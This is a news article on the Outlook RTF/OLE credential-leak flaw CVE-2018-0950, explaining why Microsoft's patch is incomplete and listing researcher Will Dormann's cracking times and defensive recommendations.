April 14, 2018 at
Microsoft has released a patch for Outlook on Tuesday that allegedly fixes over 60 exploitable points and critical flaws in the program. However, one weakness is still very much open to hackers, who can then easily acquire credentials.
The exploitable point has been identified over a year ago, through which password hashes could be leaked if the user was previewing emails with Rich Text Format (RTF) files. Opening the files was not necessary as Microsoft previews these files. If the RTF document has content with OLE (object linking and embedding) technology, previews of files that are handled by another program are embedded and rendered.
However, Microsoft does restrict the loading of other files, such as web images. This prevents the leakage of IP addresses and identifying metadata.
Threat researcher Will Dormann of the CERT Coordination Center first discovered the flaw in the November of 2016, which was then given the codename of CVE-2018-0950. Dormann states that the patch does not fully cover the exploit.
Analysis of the attack
The only user interaction necessary for the attack to take place is for the victim to open an email with an RTF file attachment. The file then launches a server message block (SMB) to contact a malicious server. It then immediately leaks sensitive data, such as IP address, a name of the domain, username, hostname, and session key.
During his proof-of-concept experiment, Dormann simulated an attack that collected password hashes, using the GitHub-hosted John the Ripper and Responder scripts. He was able to collect simple passwords in a matter of minutes on his computer alone.
A 4-letter, lowercase password took only 1 second to crack, while 8-character also lowercase passwords took 16 minutes. Mixed-case letter passwords took 3 days, and mixed-case passwords also containing numbers took 12 days.
Dormann states that the best case scenario featured 8-character-long passwords comprised of mixed-case letters, numbers, and symbols. This would have taken approximately 1 year to crack.
Following the latest of the patch of Microsoft, Outlook emails containing remotely hosted OLE content will no longer initiate an SMB session with a remote server. However, Dormann states that this does not completely immunize the user from attacks.
If the email contains a Universal Naming Convention (UNC) link, an SMB connection will be launched. These links always start with ‘\’. The only user action required for the attack to start is clicking on the link.
Finally, Dormann recommends a number of precautionary steps against such attacks. These are installing the latest MS Outlook patch, having more complex passwords, or rather, passphrases, and to use a password manager to generate them. He also recommends for system administrators to block SMB connections, which can be accomplished by closing a number of ports, as well as restricting single sign-on (SSO) logins.
Read Will Dormann’s report here.